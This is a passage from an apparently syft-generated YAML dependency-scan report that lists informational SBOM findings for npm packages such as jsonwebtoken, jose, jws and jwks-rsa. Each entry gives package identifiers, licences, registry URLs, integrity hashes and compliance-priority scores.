resolved: https://registry.npmjs.org/jose/-/jose-4.15.9.tgz
|
|
integrity: sha512-1vUQX+IdDMVPj4k8kOxgUqlcK518yluMuGZwqlr44FS1ppZB/5GWh4rZG89erpOBOJjU/OBsnCVFfapsRz6nEA==
|
|
dependencies: null
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: ad953d39f31a884d
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: js-beautify 1.15.4'
|
|
title: js-beautify 1.15.4
|
|
description: 'Package discovered: js-beautify 1.15.4'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: eb8b761fb0d3a989
|
|
name: js-beautify
|
|
version: 1.15.4
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: MIT
|
|
spdxExpression: MIT
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:js-beautify:js-beautify:1.15.4:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:js-beautify:js_beautify:1.15.4:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:js_beautify:js-beautify:1.15.4:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:js_beautify:js_beautify:1.15.4:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:js:js-beautify:1.15.4:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:js:js_beautify:1.15.4:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/js-beautify@1.15.4
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/js-beautify/-/js-beautify-1.15.4.tgz
|
|
integrity: sha512-9/KXeZUKKJwqCXUdBxFJ3vPh467OCckSBmYDwSK/EtV090K+iMJ7zx2S3HLVDIWFQdqMIsZWbnaGiba18aWhaA==
|
|
dependencies:
|
|
config-chain: ^1.1.13
|
|
editorconfig: ^1.0.4
|
|
glob: ^10.4.2
|
|
js-cookie: ^3.0.5
|
|
nopt: ^7.2.1
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: cb31e7fb1004281e
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: js-cookie 3.0.5'
|
|
title: js-cookie 3.0.5
|
|
description: 'Package discovered: js-cookie 3.0.5'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: 07274f4b8a4d661e
|
|
name: js-cookie
|
|
version: 3.0.5
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: MIT
|
|
spdxExpression: MIT
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:js-cookie:js-cookie:3.0.5:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:js-cookie:js_cookie:3.0.5:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:js_cookie:js-cookie:3.0.5:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:js_cookie:js_cookie:3.0.5:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:js:js-cookie:3.0.5:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:js:js_cookie:3.0.5:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/js-cookie@3.0.5
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/js-cookie/-/js-cookie-3.0.5.tgz
|
|
integrity: sha512-cEiJEAEoIbWfCZYKWhVwFuvPX1gETRYPw6LlaTKoxD3s2AkXzkCjnp6h0V77ozyqj0jakteJ4YqDJT830+lVGw==
|
|
dependencies: null
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: 4db17fad932f2d8e
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: js-md5 0.8.3'
|
|
title: js-md5 0.8.3
|
|
description: 'Package discovered: js-md5 0.8.3'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: d30adc61a99cb3ed
|
|
name: js-md5
|
|
version: 0.8.3
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: MIT
|
|
spdxExpression: MIT
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:js-md5:js-md5:0.8.3:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:js-md5:js_md5:0.8.3:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:js_md5:js-md5:0.8.3:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:js_md5:js_md5:0.8.3:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:js:js-md5:0.8.3:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:js:js_md5:0.8.3:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/js-md5@0.8.3
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/js-md5/-/js-md5-0.8.3.tgz
|
|
integrity: sha512-qR0HB5uP6wCuRMrWPTrkMaev7MJZwJuuw4fnwAzRgP4J4/F8RwtodOKpGp4XpqsLBFzzgqIO42efFAyz2Et6KQ==
|
|
dependencies: null
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: 88f0214bae1b08f0
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: js-tokens 4.0.0'
|
|
title: js-tokens 4.0.0
|
|
description: 'Package discovered: js-tokens 4.0.0'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: 132a500346fcea0c
|
|
name: js-tokens
|
|
version: 4.0.0
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: MIT
|
|
spdxExpression: MIT
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:js-tokens:js-tokens:4.0.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:js-tokens:js_tokens:4.0.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:js_tokens:js-tokens:4.0.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:js_tokens:js_tokens:4.0.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:js:js-tokens:4.0.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:js:js_tokens:4.0.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/js-tokens@4.0.0
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/js-tokens/-/js-tokens-4.0.0.tgz
|
|
integrity: sha512-RdJUflcE3cUzKiMqQgsCu06FPu9UdIJO0beYbPhHN4k6apgJtifcoCtT9bcxOpYBtpD2kCM6Sbzg4CausW/PKQ==
|
|
dependencies: null
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: d7056e806f2cd1e3
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: json-bigint 1.0.0'
|
|
title: json-bigint 1.0.0
|
|
description: 'Package discovered: json-bigint 1.0.0'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: f29c1976ad3d8cb0
|
|
name: json-bigint
|
|
version: 1.0.0
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: MIT
|
|
spdxExpression: MIT
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:json-bigint_project:json-bigint:1.0.0:*:*:*:*:node.js:*:*
|
|
source: nvd-cpe-dictionary
|
|
purl: pkg:npm/json-bigint@1.0.0
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/json-bigint/-/json-bigint-1.0.0.tgz
|
|
integrity: sha512-SiPv/8VpZuWbvLSMtTDU8hEfrZWg/mH/nV/b4o0CYbSxu1UIQPLdwKOCIyLQX+VIPO5vrLX3i8qtqFyhdPSUSQ==
|
|
dependencies:
|
|
bignumber.js: ^9.0.0
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: 2a5374383b13cd28
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: jsonwebtoken 9.0.3'
|
|
title: jsonwebtoken 9.0.3
|
|
description: 'Package discovered: jsonwebtoken 9.0.3'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: 2ebcc52db7d200cb
|
|
name: jsonwebtoken
|
|
version: 9.0.3
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: MIT
|
|
spdxExpression: MIT
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:auth0:jsonwebtoken:9.0.3:*:*:*:*:node.js:*:*
|
|
source: nvd-cpe-dictionary
|
|
purl: pkg:npm/jsonwebtoken@9.0.3
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/jsonwebtoken/-/jsonwebtoken-9.0.3.tgz
|
|
integrity: sha512-MT/xP0CrubFRNLNKvxJ2BYfy53Zkm++5bX9dtuPbqAeQpTVe0MQTFhao8+Cp//EmJp244xt6Drw/GVEGCUj40g==
|
|
dependencies:
|
|
jws: ^4.0.1
|
|
lodash.includes: ^4.3.0
|
|
lodash.isboolean: ^3.0.3
|
|
lodash.isinteger: ^4.0.4
|
|
lodash.isnumber: ^3.0.3
|
|
lodash.isplainobject: ^4.0.6
|
|
lodash.isstring: ^4.0.1
|
|
lodash.once: ^4.0.0
|
|
ms: ^2.1.1
|
|
semver: ^7.5.4
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: 835e252fefb47867
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: jwa 2.0.1'
|
|
title: jwa 2.0.1
|
|
description: 'Package discovered: jwa 2.0.1'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: 154697ca4fb19b8b
|
|
name: jwa
|
|
version: 2.0.1
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: MIT
|
|
spdxExpression: MIT
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:jwa:jwa:2.0.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/jwa@2.0.1
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/jwa/-/jwa-2.0.1.tgz
|
|
integrity: sha512-hRF04fqJIP8Abbkq5NKGN0Bbr3JxlQ+qhZufXVr0DvujKy93ZCbXZMHDL4EOtodSbCWxOqR8MS1tXA5hwqCXDg==
|
|
dependencies:
|
|
buffer-equal-constant-time: ^1.0.1
|
|
ecdsa-sig-formatter: 1.0.11
|
|
safe-buffer: ^5.0.1
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: 0c0a903cc4471d02
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: jwks-rsa 3.2.2'
|
|
title: jwks-rsa 3.2.2
|
|
description: 'Package discovered: jwks-rsa 3.2.2'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: 014369d0efdc09b2
|
|
name: jwks-rsa
|
|
version: 3.2.2
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: MIT
|
|
spdxExpression: MIT
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:jwks-rsa:jwks-rsa:3.2.2:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:jwks-rsa:jwks_rsa:3.2.2:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:jwks_rsa:jwks-rsa:3.2.2:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:jwks_rsa:jwks_rsa:3.2.2:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:jwks:jwks-rsa:3.2.2:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:jwks:jwks_rsa:3.2.2:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/jwks-rsa@3.2.2
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/jwks-rsa/-/jwks-rsa-3.2.2.tgz
|
|
integrity: sha512-BqTyEDV+lS8F2trk3A+qJnxV5Q9EqKCBJOPti3W97r7qTympCZjb7h2X6f2kc+0K3rsSTY1/6YG2eaXKoj497w==
|
|
dependencies:
|
|
'@types/jsonwebtoken': ^9.0.4
|
|
debug: ^4.3.4
|
|
jose: ^4.15.4
|
|
limiter: ^1.1.5
|
|
lru-memoizer: ^2.2.0
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: 5dd04dd82934e4bc
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: jws 4.0.1'
|
|
title: jws 4.0.1
|
|
description: 'Package discovered: jws 4.0.1'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: 7fed8e7a1bc916bb
|
|
name: jws
|
|
version: 4.0.1
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: MIT
|
|
spdxExpression: MIT
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:jws:jws:4.0.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/jws@4.0.1
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/jws/-/jws-4.0.1.tgz
|
|
integrity: sha512-EKI/M/yqPncGUUh44xz0PxSidXFr/+r0pA70+gIYhjv+et7yxM+s29Y+VGDkovRofQem0fs7Uvf4+YmAdyRduA==
|
|
dependencies:
|
|
jwa: ^2.0.1
|
|
safe-buffer: ^5.0.1
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: fdd5e753a1967298
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: leac 0.6.0'
|
|
title: leac 0.6.0
|
|
description: 'Package discovered: leac 0.6.0'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: 9ec1624bf944fe34
|
|
name: leac
|
|
version: 0.6.0
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: MIT
|
|
spdxExpression: MIT
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:leac:leac:0.6.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/leac@0.6.0
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/leac/-/leac-0.6.0.tgz
|
|
integrity: sha512-y+SqErxb8h7nE/fiEX07jsbuhrpO9lL8eca7/Y1nuWV2moNlXhyd59iDGcRf6moVyDMbmTNzL40SUyrFU/yDpg==
|
|
dependencies: null
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: 63788a24cb56472a
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: lilconfig 3.1.3'
|
|
title: lilconfig 3.1.3
|
|
description: 'Package discovered: lilconfig 3.1.3'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: a8f0bd77b399e569
|
|
name: lilconfig
|
|
version: 3.1.3
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: MIT
|
|
spdxExpression: MIT
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:lilconfig:lilconfig:3.1.3:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/lilconfig@3.1.3
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/lilconfig/-/lilconfig-3.1.3.tgz
|
|
integrity: sha512-/vlFKAoH5Cgt3Ie+JLhRbwOsCQePABiU3tJ1egGvyQ+33R/vcwM2Zl2QR/LzjsBeItPt3oSVXapn+m4nQDvpzw==
|
|
dependencies: null
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: 90dd10f1ec21efdc
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: limiter 1.1.5'
|
|
title: limiter 1.1.5
|
|
description: 'Package discovered: limiter 1.1.5'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: 7ebb3add1191948c
|
|
name: limiter
|
|
version: 1.1.5
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: MIT
|
|
spdxExpression: MIT
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:limiter:limiter:1.1.5:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/limiter@1.1.5
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/limiter/-/limiter-1.1.5.tgz
|
|
integrity: sha512-FWWMIEOxz3GwUI4Ts/IvgVy6LPvoMPgjMdQ185nN6psJyBJ4yOpzqm695/h5umdLJg2vW3GR5iG11MAkR2AzJA==
|
|
dependencies: null
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
